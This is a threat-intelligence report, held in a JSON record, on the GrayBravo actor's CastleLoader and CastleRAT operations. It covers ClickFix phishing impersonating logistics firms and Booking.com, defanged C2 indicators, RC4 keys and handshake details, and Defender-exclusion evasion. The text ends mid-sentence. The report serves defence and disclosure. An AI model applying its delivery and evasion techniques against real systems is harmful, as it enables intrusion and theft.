{
	"id": "3f3bb40d-1e0e-4014-9662-025c7b086ce3",
	"created_at": "2026-04-06T00:21:52.044511Z",
	"updated_at": "2026-04-10T03:38:20.798396Z",
	"deleted_at": null,
	"sha1_hash": "2ee5e2315e76fdf355ed8d5272dfb84e9a94ccdd",
	"title": "GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 6305189,
	"plain_text": "GrayBravo’s CastleLoader Activity Clusters Target Multiple Industries\r\nBy Insikt Group®\r\nArchived: 2026-04-05 17:18:09 UTC\r\nNote: The analysis cut-off date for this report was November 10, 2025\r\nExecutive Summary\r\nInsikt Group continues to monitor GrayBravo (formerly tracked as TAG-150), a technically sophisticated and rapidly\r\nevolving threat actor first identified in September 2025. GrayBravo demonstrates strong adaptability, responsiveness to\r\npublic exposure, and operates a large-scale, multi-layered infrastructure. Recent analysis of GrayBravo’s ecosystem\r\nuncovered four distinct activity clusters leveraging the group’s CastleLoader malware, each defined by unique tactics,\r\ntechniques, and victim profiles. These findings reinforce the assessment that GrayBravo operates a malware-as-a-service\r\n(MaaS) model.\r\nFor example, one cluster, tracked as TAG-160, impersonates global logistics firms, using phishing lures and the ClickFix\r\ntechnique to distribute CastleLoader while spoofing legitimate emails and exploiting freight-matching platforms to target\r\nvictims. Another cluster, tracked as TAG-161, impersonates Booking.com, also employing ClickFix to deliver CastleLoader\r\nand Matanbuchus and novel phishing email management tools. Further investigation through historical panel analysis linked\r\nthe online persona “Sparja”, a user active on Exploit Forums, to potential GrayBravo-associated activities, based on the\r\nalias’s distinctiveness and related discussion topics.\r\nTo protect against GrayBravo, security defenders should block IP addresses and domains tied to associated loaders,\r\ninfostealers, and remote access trojans (RATs), flag and potentially block connections to unusual legitimate internet services\r\n(LISs) such as Pastebin, and deploy updated detection rules (YARA, Snort, Sigma) for current and historical infections.\r\nOther controls include implementing email filtering and data exfiltration monitoring. See the Mitigations section for\r\nimplementation guidance and Appendix H for a complete list of indicators of compromise (IoCs).\r\nKey Findings\r\nInsikt Group uncovered four distinct activity clusters leveraging GrayBravo’s CastleLoader, each exhibiting unique\r\ntactics, techniques, and procedures (TTPs) and victim profiles, reinforcing the assessment that GrayBravo operates a\r\nmalware-as-a-service (MaaS) ecosystem, as previously hypothesized.\r\nOne cluster, tracked as TAG-160, impersonates logistics firms and deploys phishing lures combined with the\r\nClickFix technique to distribute CastleLoader, while spoofing legitimate emails and abusing freight-matching\r\nplatforms to engage targets.\r\nCluster 2, tracked as TAG-161, impersonates Booking.com and uses ClickFix techniques to deliver CastleLoader and\r\nMatanbuchus, relying on threat actor-controlled infrastructure and employing previously unseen phishing email\r\nmanagement tooling.\r\nBackground\r\nIn September 2025, Insikt Group reported on a newly identified threat actor, TAG-150, assessed to have been active since at\r\nleast March 2025. Since our previous reporting, we have decided to classify TAG-150 as GrayBravo. It is believed to be\r\nresponsible for developing multiple custom malware families, beginning with CastleLoader and CastleBot, and most\r\nrecently, CastleRAT. It is characterized by rapid development cycles, technical sophistication, responsiveness to public\r\nreporting, and an expansive, evolving infrastructure. Alongside the discovery of the previously undocumented remote access\r\ntrojan CastleRAT, Insikt Group identified GrayBravo’s multi-tiered infrastructure and its use of various supporting services,\r\nincluding file-sharing platforms and anti-detection tools.\r\nAlthough public reporting has suggested that GrayBravo operates under a malware-as-a-service (MaaS) model, supported by\r\nits delivery of diverse second-stage payloads, the proliferation of CastleLoader administration panels, and features typical of\r\nMaaS platforms, Insikt Group has not identified any advertisements or discussions of this service on underground forums.\r\nRecorded Future® Network Intelligence indicates that GrayBravo predominantly interacts with its own infrastructure, with\r\nonly a limited number of external IP addresses, possibly representing customers or affiliates, observed communicating with\r\nit. Many of these connections are routed through Tor nodes, complicating attribution and classification.\r\nThrough continued monitoring, Insikt Group has identified multiple clusters of activity linked to GrayBravo, reinforcing the\r\nassessment that the threat actor is operating a MaaS ecosystem (see Figure 1). This report details the tactics, techniques, and\r\nprocedures (TTPs) associated with these clusters, believed to represent potential GrayBravo customers or affiliates. More\r\nspecifically, Insikt Group identified four clusters linked to GrayBravo’s CastleLoader activity: one targeting the logistics\r\nsector (TAG-160), another using Booking.com-themed lures across a wider range of victims (TAG-161), a third also\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 1 of 39\n\nimpersonating Booking.com but independent from the previous group, and a fourth distributing CastleLoader through\r\nmalvertising and fake software updates.\r\nFigure 1: Overview of GrayBravo and associated clusters (Source: Recorded Future)\r\nThreat Analysis\r\nHigher Tier Infrastructure\r\nInsikt Group previously identified an extensive, multi-tiered infrastructure tied to GrayBravo. The infrastructure consists of\r\nTier 1 victim-facing C2 servers associated with malware families such as CastleLoader, SecTopRAT, WarmCookie, and the\r\nnewly discovered CastleRAT, as well as Tier 2, Tier 3, and Tier 4 servers, the latter of which are likely used for backup\r\npurposes. Figure 2 provides an overview of the infrastructure used by GrayBravo.\r\nFigure 2: Multi-tiered infrastructure linked to GrayBravo (Source: Recorded Future)\r\nCastleRAT\r\nCastleRAT is a remote access trojan (RAT) observed in both C and Python variants that share several core characteristics.\r\nEach variant communicates through a custom binary protocol secured with RC4 encryption and hard-coded sixteen-byte\r\nkeys. Upon execution, CastleRAT queries a geolocation application programming interface (API) using ip-api[.]com to\r\nobtain victim geographic location and network details. Both variants support remote command execution, file download and\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 2 of 39\n\nexecution, and establish an interactive remote shell. The C variant exhibits additional capabilities, including browser\r\ncredential theft, keylogging, and screen capture functionality.\r\nInfrastructure Analysis\r\nAnalysis of CastleRAT C-variant command-and-control (C2) infrastructure reveals notable operational overlap across\r\nmultiple nodes sharing the RC4 key “NanuchkaUpyachka.” As illustrated in Figure 3, Insikt Group observed two\r\nCastleRAT C2 servers, 104[.]225[.]129[.]171 and 144[.]208[.]126[.]50, maintain concurrent communications with at least\r\nthree US-based victims, suggesting coordinated or redundant control channels. The overlapping traffic patterns, observed\r\nwithin the same daily collection windows, indicate that compromised hosts reached out to multiple C2s nearly\r\nsimultaneously rather than migrating between them over time. This behavior implies a deliberate redundancy strategy\r\nemployed by the threat actor. Additionally, direct communications between two CastleRAT C variants,\r\n104[.]225[.]129[.]171 and 195[.]85[.]115[.]44, further point to an interconnected infrastructure ecosystem rather than\r\nisolated C2 instances. Such internal connectivity could facilitate automated data synchronization, lateral control distribution,\r\nor key exchange mechanisms within the threat actor’s tooling, underscoring a more mature coordinated operational model\r\nthan previously documented.\r\nFigure 3: Victim communication with multiple CastleRAT C2 servers simultaneously (Source: Recorded Future)\r\nNotably, some CastleRAT samples exhibit behavior distinct from other observed variants by incorporating an elaborate\r\nhandshake sequence and redundancy in their C2 communications. In these cases, the client’s initial request to the C2 server\r\n(for example, 77[.]238[.]241[.]203:443) ends with the bytes 07 00 00 00 instead of the usual 01 00 00 00 , and the\r\nserver responds with trailing bytes 9e ff 74 70 before closing the connection. A similar exchange occurs with\r\n5[.]35[.]44[.]176, after which the client reconnects to the first C2, transmitting only an encrypted sixteen-byte RC4 key and\r\nreceiving trailing bytes 01 00 00 00 in response. The client then repeats this process with the second C2, sending 01 00\r\n00 00 and receiving only the encrypted sixteen-byte RC4 key in return. This pattern suggests the use of additional\r\nhandshake stages and dual-C2 redundancy mechanisms not seen in all CastleRAT samples.\r\nClustering by RC4 Key\r\nAnalysis of CastleRAT infrastructure identified multiple clusters of IP addresses grouped by hard-coded RC4 encryption\r\nkeys (see Figure 4). While each RC4 key forms a distinct cluster, all clusters exhibit some degree of overlap through shared\r\nkeys, suggesting a deliberate or coordinated relationship rather than a coincidental overlap. This interconnected structure\r\nsuggests a shared tooling or deployment framework underpinning both CastleRAT and CastleLoader operations. Although\r\nthis does not conclusively establish single-threat actor control, the degree overlap implies a common developer or operator\r\necosystem rather than independent, uncoordinated usage of the malware.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 3 of 39\n\nFigure 4: RC4 key clusters (Source: Recorded Future)\r\nCastleLoader\r\nInfrastructure Analysis\r\nInsikt Group identified additional C2 infrastructure associated with CastleLoader. The related domains and IP addresses are\r\nlisted in Appendix A. Notably, several domains share the same WHOIS start of authority (SOA) email address, indicating\r\nthey were likely registered by the same threat actor.\r\nNotably, the domain oldspicenotsogood[.]shop is linked to several other domains listed in Appendix B, which are likely\r\nused for malicious activity, including impersonation of legitimate brands such as DocuSign, Norton, and TradingView.\r\nAdditionally, at least one of these domains, testdomain123123[.]shop, has been identified as a LummaC2 C2 server.\r\nActivity Clusters\r\nInsikt Group identified four distinct clusters of activity associated with the deployment of CastleLoader (see Figure 4). The\r\nfirst cluster, tracked as TAG-160, appears to be highly targeted toward the logistics sector, employing techniques specifically\r\ntailored to this industry. In contrast, the second cluster, tracked as TAG-161, exhibits a broader targeting scope and leverages\r\nBooking.com-themed lures. The third cluster likewise impersonates Booking.com but shows no overlap with TAG-161. The\r\nfourth cluster relies on malvertising campaigns and fake software update mechanisms.\r\nBased on Insikt Group’s assessment, these clusters are associated with distinct users deploying CastleLoader, as no overlap\r\nin infrastructure or tactics was observed between them. At this stage, the exact nature of the relationship between these users\r\nand GrayBravo (formerly tracked as TAG-150) remains unclear. Insikt Group further assesses that additional CastleLoader\r\nusers are likely active, supported by proprietary Recorded Future intelligence and the large number of identified panels,\r\nwhich collectively suggest a broader user base.\r\nCluster 1: Logistics Sector-Focused Activity Tracked as TAG-160\r\nCluster 1, tracked as TAG-160, has been active since at least March 2025 and remains operational at the time of analysis.\r\nTAG-160 employs infrastructure that impersonates logistics companies and leverages logistics-themed phishing lures,\r\namong other tactics. It uses ClickFix techniques to deliver CastleLoader, among additional payloads. Evidence suggests the\r\ncluster operates a mix of threat actor-controlled and -compromised infrastructure. Additionally, it has been observed\r\nexploiting vulnerabilities in target organizations’ systems, such as spoofing legitimate email senders from logistics\r\ncompanies to enhance the credibility of its phishing campaigns. In addition, Cluster 1 uses access to the legitimate freight-matching platforms DAT Freight \u0026 Analytics and Loadlink Technologies for multiple purposes.\r\nAttack Flow\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 4 of 39\n\nCluster 1 employs spearphishing campaigns in combination with ClickFix techniques to compromise victims. Figure 5\r\nillustrates a high-level overview of the phishing attack flow.\r\nFigure 5: ClickFix attack flow used by TAG-160 (Source: Recorded Future)\r\nThe attack chain typically begins with either a spoofed legitimate email address (for example, no-reply[@]englandlogistics[.]com) or a threat actor-controlled address associated with a typosquatted domain (for example,\r\nenglandloglstics[.]com), impersonating companies such as England Logistics. Historically, such emails have been sent to\r\nUS-based carriers, presenting fraudulent freight quotes that appear to originate from England Logistics. However, other\r\norganizations likely to be influenced by logistics-themed lures cannot be ruled out as potential targets.\r\nThe emails prompt recipients to click a link to view a supposed rate confirmation for a shipment, instructing them to copy\r\nand paste the link into a browser if it does not open directly. The threat actors often add a sense of urgency, warning that the\r\nlink will soon expire. Clicking the link leads victims to a landing page designed to harvest information (see Figure 6). Insikt\r\nGroup has observed multiple variations of these landing pages.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 5 of 39\n\nFigure 6: “dpeforms” lure used by TAG-160 (Source: Recorded Future)\r\nNotably, although Insikt Group was unable to retrieve the landing page associated with another Cluster 1–linked domain,\r\nloadstracking[.]com, indexed Google search results indicate that the domain likely hosted the same or a similar page as\r\nobserved in Figure 7. DPE likely stands for “Direct Port Entry,” which is a system designed for exporters, allowing goods to\r\nbe directly moved from their premises to the port and loaded onto the vessel for export without being transferred to a\r\ncontainer freight station.\r\nFigure 7: “dpeforms” page found in Google Search (Source: Recorded Future)\r\nAfter submitting their information, the victim is presented with ClickFix-style instructions, guiding them through a series of\r\nsteps purportedly required to complete a document signing process (see Figure 8). By incorporating the DocuSign logo, the\r\nthreat actors likely aim to enhance the perceived legitimacy of the page and further deceive the victim.\r\nFigure 8: DocuSign-themed ClickFix used by TAG-160 (Source: Recorded Future)\r\nBy following the instructions shown in Figure 8, the victim unknowingly executes the command illustrated in Figure 9.\r\nThis command runs silently in the background, downloads and extracts a payload archive from a remote IP address,\r\nexecutes a Python-based malware using pythonw.exe , and displays a decoy message to appear legitimate. Observed\r\npayloads delivered through this method include CastleLoader, HijackLoader, Rhadamanthys, and zgRAT.\r\nFigure 9: ClickFix command (Source: Recorded Future)\r\nUse of Compromised Infrastructure\r\nAs part of TAG-160’s phishing infrastructure, the threat actors appear to rely not only on spoofed email addresses, as\r\npreviously described, but also on compromised systems. Insikt Group has observed indications that the threat actors likely\r\nleveraged compromised infrastructure to send phishing emails. For example, at least one domain used to distribute phishing\r\nmessages contained malware logs from infostealers such as LummaC2, including stolen credentials for a Namecheap\r\naccount.\r\nInfrastructure Analysis\r\nInsikt Group identified a large number of domains and IP addresses associated with Cluster 1, all of which either\r\nimpersonate logistics companies or align with logistics-themed phishing lures (see Appendix C). Notably, the majority of\r\nthese domains include the subdomain apps[.]englandlogistics (for example,\r\napps[.]englandlogistics[.]rateconfirmations[.]com), suggesting they were likely designed to impersonate England Logistics,\r\nas outlined in the previous section. One domain, loadstrucking[.]com, instead featured the subdomain app[.]england,\r\nfollowing a similar naming pattern.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 6 of 39\n\nInsikt Group identified the subdomain files[.]loadstracking[.]com, hosted on the IP address 89[.]185[.]84[.]211 between\r\nJuly 6 and September 26, 2025, which was serving the file newtag.zip (SHA256:\r\nd87ccd5a2911e46a1efbc0ef0cfe095f136de98df055eacd1c82de76ae6fecec). The ZIP folder contained a legitimate WinGup\r\nexecutable for Notepad++ that sideloaded a malicious libcurl.dll identified as DonutLoader. This loader subsequently\r\nretrieved three intermediate payloads from the legitimate subdomain files-accl[.]zohoexternal[.]com.\r\nDomain Re-Registration Tactic\r\nSimilarly, Insikt Group assesses that to further enhance the perceived legitimacy of their infrastructure, the threat actor\r\ndeliberately re-registered domains previously associated with legitimate logistics companies, in addition to using\r\ntyposquatted domains. Figure 10 provides two examples of this activity.\r\nFigure 10: Re-registration of logistics-themed domains (Source: Recorded Future)\r\nNotably, the domain cdlfreightlogistics[.]com appears to have previously hosted a website associated with the legitimate\r\ncompany CDL Freight Logistics, Inc. in 2023. Similarly, the domain hometownlogisticsllc[.]com hosted a website for\r\nHometown Logistics LLC in 2021 (see Figure 11).\r\nFigure 11: Registration of domains previously owned by legitimate logistics companies (Source: Recorded Future)\r\nPublic Complaints and Suspected Access to DAT and Loadlink\r\nSome of the domains listed in the Infrastructure Analysis section have been publicly referenced in connection with\r\nsuspicious or fraudulent activity. For example, the email address david[@]cdlfreightlogistics[.]com, associated with the\r\ndomain cdlfreightlogistics[.]com, first appeared on August 26, 2025, in a public Telegram channel named\r\n“current_hot_loads”, a forum used by individuals and companies in the logistics industry to share information such as\r\nmarket rates. In that instance, a user asked other members whether an email was legitimate (see Figure 12). Several\r\nrespondents indicated they did not believe it to be legitimate.\r\nFigure 12: Example phishing email sent by TAG-160 (Source: Recorded Future)\r\nWhile Insikt Group was unable to obtain additional details about the email exchange linked to the email posted in the\r\nchannel, the available text suggests that the threat actor initially contacted potential victims without including malicious\r\ncontent, likely aiming to establish rapport before sending follow-up messages containing malicious links.\r\nIn another instance, Insikt Group identified a post from an employee of a legitimate logistics company based in Rhode\r\nIsland, USA, describing an incident in which a threat actor created accounts impersonating their company on DAT Freight \u0026\r\nAnalytics (dat.com) and Loadlink Technologies (loadlink.ca), both platforms operating in the freight matching industry (see\r\nFigure 13). The fraudulent registrations used fake company information, including the email address paul[@]mrlogsol[.]ca,\r\nwhich is associated with Cluster 1–linked infrastructure. Notably, in line with Cluster 1’s typical patterns, the email\r\naddresses used in these operations often consist of only a first name (for example, Paul). The employee reported having\r\ncontacted both DAT and Loadlink to alert them to the fraudulent activity.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 7 of 39\n\nFigure 13: Complaint on Facebook written by an individual targeted by TAG-160 (Source: Recorded Future)\r\nBased on a confirmation email from one of the platforms’ abuse reporting teams, which the employee shared on Facebook as\r\nwell, it appears that the threat actor was also using a Gmail address impersonating their company,\r\nmaritza[.]rmlogisticsol[@]gmail[.]com (see Figure 14).\r\nFigure 14: Email shared by an individual targeted by TAG-160 (Source: Recorded Future)\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 8 of 39\n\nThreat actors associated with Cluster 1 appear to have access to fraudulent DAT and Loadlink accounts, as evidenced by a\r\nuser report of fraudulent activity on Facebook (see Figure 13) and further supported by additional profiles identified by\r\nInsikt Group (see Figure 15). Furthermore, Insikt Group assesses that the threat actors may also have access to\r\ncompromised legitimate accounts, given the substantial volume of stolen credentials associated with the domains dat[.]com\r\nand loadlink[.]ca observed in Recorded Future Identity Intelligence.\r\nFigure 15: Account information linked to TAG-160 (Source: Recorded Future)\r\nAccess to platforms like DAT Freight \u0026 Analytics and Loadlink Technologies not only enables the threat actors to enhance\r\nthe appearance of legitimacy, allowing them to maintain plausible profiles should potential victims attempt verification, but\r\nalso provides opportunities to gather contact information for prospective targets and obtain additional contextual data, such\r\nas details on specific loads, dates and times, documents, or related materials, which can then be repurposed as spearphishing\r\nlures. In addition, although not verified in this specific case, the threat actors may also post fraudulent load listings\r\ncontaining malicious content, potentially resulting in malware infections.\r\nPossible Overlap with September 2024 Campaign\r\nIn September 2024, Proofpoint reported on an unattributed activity cluster observed since at least May 2024. The threat\r\nactors targeted transportation and logistics companies in North America to distribute various malware families, including\r\nLummaC2, StealC, and NetSupport RAT, as well as remote monitoring and management (RMM) tools such as SimpleHelp,\r\nPDQ Connect, Fleetdeck, and ScreenConnect. The campaigns employed several techniques: The threat actors compromised\r\nlegitimate email accounts belonging to transportation and shipping companies, injecting malicious content into existing\r\nemail threads to enhance credibility. They also used compromised accounts on DAT Freight \u0026 Analytics and Loadlink\r\nplatforms to post fraudulent load listings containing malicious URLs leading to RMM downloads. Lastly, they launched\r\nbroader phishing waves that directed recipients to staging web pages hosting RMM installers. Most campaigns involved\r\nGoogle Drive URLs or attached .URL shortcut files that, when executed, used SMB to retrieve an executable from a remote\r\nshare, leading to malware installation.\r\nWhile Insikt Group has not identified direct technical overlaps (for example, shared infrastructure), the similar targeting and\r\npartially overlapping tactics, particularly the use of DAT Freight \u0026 Analytics and Loadlink, suggest a possible connection\r\nbetween this activity cluster and Cluster 1 (this is a low-confidence assessment).\r\nNotably, in November 2025, Proofpoint reported again on a possibly related activity where cybercriminals targeted trucking\r\nand logistics companies using RMM tools to hijack shipments. The attackers lured victims through fake load postings or\r\ncompromised email threads, delivering malware or RMM software to gain access. This campaign highlights the growing\r\nconvergence of cyber and physical cargo theft as criminals exploit digital logistics systems.\r\nCluster 2: Matanbuchus and Mailer Tool Activity Tracked as TAG-161\r\nCluster 2, tracked as TAG-161, has been active since at least June 2025 and remains operational at the time of analysis. The\r\ncluster leverages infrastructure impersonating Booking.com and employs ClickFix techniques. It primarily delivers\r\nCastleLoader and other payloads, including Matanbuchus. Notably, Insikt Group observed this cluster using Matanbuchus.\r\nEvidence indicates that the cluster relies mainly on threat actor-controlled infrastructure. Furthermore, Insikt Group\r\nidentified a previously unreported phishing email management tooling, which appears to be used by threat actors linked to\r\nCluster 2.\r\nMatanbuchus Activity and Booking.com-Themed Infrastructure\r\nAlongside CastleLoader, several Matanbuchus samples were distributed through Booking.com-themed ClickFix campaigns\r\nassociated with Cluster 2. Notably, Insikt Group had previously reported Matanbuchus activity linked to CastleRAT in an\r\nearlier publication, where the Matanbuchus C2 panel was hosted on the adjacent IP address, 185[.]39[.]19[.]164 (see\r\nFigure 16).\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 9 of 39\n\nFigure 16: Matanbuchus panel on 185[.]39[.]19[.]164 (Source: Recorded Future)\r\nMatanbuchus is a C-based downloader MaaS available since 2021. One of its primary objectives is secrecy, which is in part\r\nfostered by limiting sales to a select number of customers. Currently at version three, it is continually maintained and\r\nimproved by its creator BelialDemon. BelialDemon offers Matanbuchus 3.0 as a monthly rental service with two pricing\r\ntiers based on the communication protocol: $10,000 per month for the HTTPS-based version and $15,000 per month for the\r\nDNS-based version.\r\nRecorded Future Malware Intelligence’s most recent Matanbuchus sample at the time of writing communicated with its C2\r\nserver at mechiraz[.]com, a domain behind Cloudflare but linked to the IP address 5[.]178[.]1[.]8 (TRIBEKA-AS, PA;\r\nAS211059). This IP address was also associated with the domain nicewk[.]com, previously reported by Morphisec.\r\nHistorical analysis of the same IP revealed several additional Matanbuchus C2 domains, including galaxioflow[.]com and\r\nnimbusvaults[.]com.\r\nAdditional Booking.com-Themed Infrastructure\r\nBy analyzing the same /24 CIDR range that hosted the Matanbuchus infrastructure during the period of observed activity,\r\nInsikt Group identified additional IP addresses and domains linked to Booking.com-themed ClickFix operations. These\r\nnetwork indicators, detailed in Appendix D, are tracked by Insikt Group as part of Cluster 2.\r\nPhishing Email Management Tooling\r\nBy analyzing the IP addresses hosting the domains listed in Appendix D, Insikt Group identified three that stood out for\r\neach hosting three previously unreported websites or management panels operating on high ports. The panels featured the\r\nfollowing HTML titles: “Менеджер Email”, “Менеджер Редиректов и рассылок”, and “Менеджер Редиректов и Email”\r\n(translated as “Redirect and Email Manager”). Based on their visual appearance, technical implementation, and thematic\r\nfocus, Insikt Group assesses that these websites are used in tandem as part of campaigns specifically targeting Booking.com.\r\nWebsite 1: Redirect and Email Manager (“Менеджер Редиректов и Email”)\r\nThe first website, hosted on port 56723, serves as a web-based interface for managing bulk redirections and email\r\ncampaigns (see Figure 17). It integrates redirect generation, SMTP configuration, and email distribution capabilities within\r\na single dashboard. The design, terminology, and functionality closely align with those typically observed in malspam or\r\nphishing infrastructure management panels.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 10 of 39\n\nFigure 17: Page linked to “Redirect and Email Manager” tool (Source: Recorded Future)\r\nWithin the document object model (DOM) of the website, Insikt Group identified two email addresses, with one of them\r\nbeing likely a compromised account used to send phishing emails. At the time of discovery, the rambler email address, likely\r\na burner account, appeared within the page’s SMTP configuration with associated credentials, indicating its use as the\r\nprimary sender account for automated bulk email delivery, consistent with the panel’s design for coordinated phishing or\r\nspam distribution. The DOM also contained an AWS access key.\r\nAdditionally, the DOM referenced a set of domains, some of which are listed in Appendix D, while others were newly\r\nidentified and are listed in Appendix E. By searching for the phrase “Сервис редиректов работает для [domain]”\r\n(translated as “The redirect service works for [domain]”), Insikt Group discovered further related domains, likewise shown\r\nin Appendix E.\r\nWebsite 2: Email Manager (“Менеджер Email”)\r\nThe second website, hosted on port 56724, closely resembles the first “Redirect and Mailing Manager” panel but exhibits\r\nseveral notable configuration differences (see Figure 18). These include a distinct AWS username, an SMTP sender address,\r\nbred[@]booking-porta[.]com, as well as different logging settings and a few additional indicators of compromise.\r\nFurthermore, the website specified 109[.]104[.]153[.]87 as its proxy server.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 11 of 39\n\nFigure 18: Page linked to “Email Manager” tool (Source: Recorded Future)\r\nWebsite 3: Booking-Mailer V2.2 (“Менеджер Редиректов и рассылок”)\r\nThe third website, hosted on port 56725, features a substantially larger DOM and functions as a combined redirect generator\r\nand mass-mailing platform (see Figure 19). The user interface exposes key capabilities, including domain selection,\r\nsubdomain base-name configuration, HTML email templating (supporting URL placeholders for generated redirects), target\r\nfile uploads, worker/thread management, SMTP pool configuration and validation, proxy editing, and real-time logging and\r\nstatistics. Redirects are constructed using a domain and base name to generate unique subdomain links following the format:\r\n[identifier].[base_name].[main_domain] .\r\nFigure 19: Page linked to “Booking-Mailer V2.2” tool (Source: Recorded Future)\r\nThe domains site-riko[.]com, site-sero[.]com, site-silo[.]com, site-tiko[.]com, and site-filo[.]com are all referenced within\r\nthe DOM.\r\nNotably, within the “debug logs” in the DOM of the website, Insikt Group found a range of proxy servers with varying high\r\nports. The IP addresses are listed in Table 1.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 12 of 39\n\nIP Address Ports\r\n109[.]104[.]153[.]100 11599, 12305, 13267, 13275\r\n109[.]104[.]153[.]193 10324, 10616, 14195, 14196\r\n109[.]104[.]153[.]29 13413, 14900\r\n109[.]104[.]154[.]67 11264, 11860, 14100, 14122\r\nTable 1: Proxy IP addresses found in DOM of “Booking-Mailer V2.2” tool (Source: Recorded Future)\r\nInsikt Group identified additional instances of the Phishing Email Management Tooling, all hosted on IP addresses\r\nannounced by the same set of Autonomous Systems (ASes). The identified IP addresses are listed in Table 2. The domains\r\nhosted on these IP addresses are listed in Appendix H.\r\nIP Address ASN Notes\r\n85[.]208[.]84[.]65\r\nSTIMUL-AS, RU\r\n(AS211659)\r\nCertificate subject common name: guesitastayhotel[.]com\r\nCastleRAT and Matanbuchus C2 servers identified within the same\r\n/24 range (85[.]208[.]84[.]115 and 85[.]208[.]84[.]242,\r\nrespectively)\r\n80[.]64[.]18[.]245\r\nSTIMUL-AS, RU\r\n(AS211659)\r\nHosts hotel-themed domains\r\n185[.]39[.]19[.]94\r\nOPTIMA-AS, RU\r\n(AS216341)\r\nCertificate subject common name: guesitastayhotel[.]com\r\n88[.]214[.]50[.]83\r\nOPTIMA-AS, RU\r\n(AS216341)\r\nSuspected testing server due to the number of domains including\r\nthe keywords “test” and “demo”\r\nTable 2: Additional infrastructure instances of the Phishing Email Management Tooling (Source: Recorded Future)\r\nASN Cluster Possibly Linked to Bearhost\r\nInsikt Group observed significant infrastructure activity associated with AS216341 (STIMUL-AS) and AS216341\r\n(OPTIMA-AS) throughout this research. Both ASes were established on March 11, 2025, and have demonstrated consistent\r\nmalicious activity since their inception. According to researchers at DeepCode, these providers maintain strong links to the\r\nBEARHOST bulletproof hosting network, a known enabler of malicious cyber operations. BEARHOST and associated\r\nproviders have reportedly serviced ransomware operations, including LockBit, Conti, MedusaLocker, as well as sanctioned\r\nentities such as Garantex, Lazarus Group, Zservers, and Nobitex. That same research further identified malicious activity\r\nand customer bases linked to both AS211659 and AS216341, consistent with Insikt Group’s own observations of Lumma,\r\nRhadamanthys, and Matanbuchus within these autonomous systems. This overlap in observed threats reinforces the\r\nassessment that both autonomous systems are part of a broader BEARHOST-aligned infrastructure ecosystem supporting\r\nfinancially motivated cyber operations.\r\nInfrastructure Similarities with TAG-157 (RefBroker)\r\nInsikt Group has previously reported on threat actors impersonating Booking.com, including TAG-157, also known as\r\nRefBroker. Notably, domains associated with TAG-157 have been observed hosted on IP address 77[.]83[.]207[.]56,\r\nadjacent to 77[.]83[.]207[.]55, with the latter being part of TAG-161’s infrastructure. More broadly, both TAG-157 and\r\nTAG-161 appear to favor the same set of ASNs discussed in the section ASN Cluster Possibly Linked to Bearhost. At\r\npresent, however, the exact relationship between TAG-157 and TAG-161 remains unclear.\r\nCluster 3: Booking.com Impersonation Activity\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 13 of 39\n\nCluster 3 has been active since at least March 2025 and remains operational at the time of analysis. The cluster leverages\r\ninfrastructure impersonating Booking.com, ClickFix techniques, and uses Steam Community pages as a dead drop resolver\r\nto deliver CastleRAT via CastleLoader. Although the techniques appear similar to those described in Cluster 2, Insikt Group\r\nhas not identified any technical overlaps between Clusters 2 and 3 at this time.\r\nInfrastructure Analysis\r\nInsikt Group noted a CastleRAT sample that leveraged a Booking.com phishing domain, update-info4468765[.]com (see\r\nFigure 20). The phishing domain tricks users into running a malicious PowerShell command (via ClickFix techniques) that\r\ndownloads a second-stage script from boiksal[.]com/upd. This script retrieves and executes a .NET loader that repeatedly\r\nspawns new PowerShell processes to add Windows Defender exclusions for the eventual payload ( update.exe ) using a\r\nUser Account Control (UAC) prompt flooding loop to bypass analysis sandboxes and security controls. Once exclusions are\r\napplied, the loader decrypts and launches the CastleLoader payload, which then reaches out to its C2 domain,\r\nprogramsbookss[.]com, resolved through a Steam Community profile. The use of Steam Community profiles allows\r\nattackers to update infrastructure dynamically without redeploying malware (see Figure 21). CastleRAT samples that use\r\nSteam for deaddrops may sometimes contain a hard-coded backup C2 in the event the deaddrop C2 retrieval fails. A list of\r\nall observed Steam Community profiles and the various C2 domains observed on each is found in Appendix F.\r\nFigure 20: GrayBravo’s CastleRAT using Steam Community for dead drop resolving (Source: Steam)\r\nAt the time of analysis, update-info4468765[.]com and boiksal[.]com were both hosted on 178[.]17[.]57[.]103, while the\r\nSteam-resolved C2 domain, programsbookss[.]com, was hosted on an adjacent IP, 178[.]17[.]57[.]102. This close\r\nplacement within the same /24 subnet suggests that the operators likely acquired these IP addresses around the same time. It\r\nalso suggests that they were assigned sequentially by the hosting provider, Global Connectivity Solutions (AS215540). A\r\nsimilar pattern was later observed across the 192[.]109[.]138[.]0/24 range, where Booking.com-themed phishing domains\r\nwere hosted on 192[.]109[.]138[.]103 and the Steam-resolved C2 domains, programsbookss[.]com and\r\njustnewdmain[.]com, were hosted on 192[.]109[.]138[.]102.\r\nhttps://www.recordedfuture.com/research/graybravos-castleloader-activity-clusters-target-multiple-industries\r\nPage 14 of 39\n\nFigure 21: Booking.com-themed ClickFix linked to Cluster 3 (Source: Recorded Future)\r\nWhen scanned, the Booking.com-themed domains typically return either a Cloudflare-themed turnstile page or a “turnstile\r\ntoken missing” error message (1, 2). Further pivoting from the domain 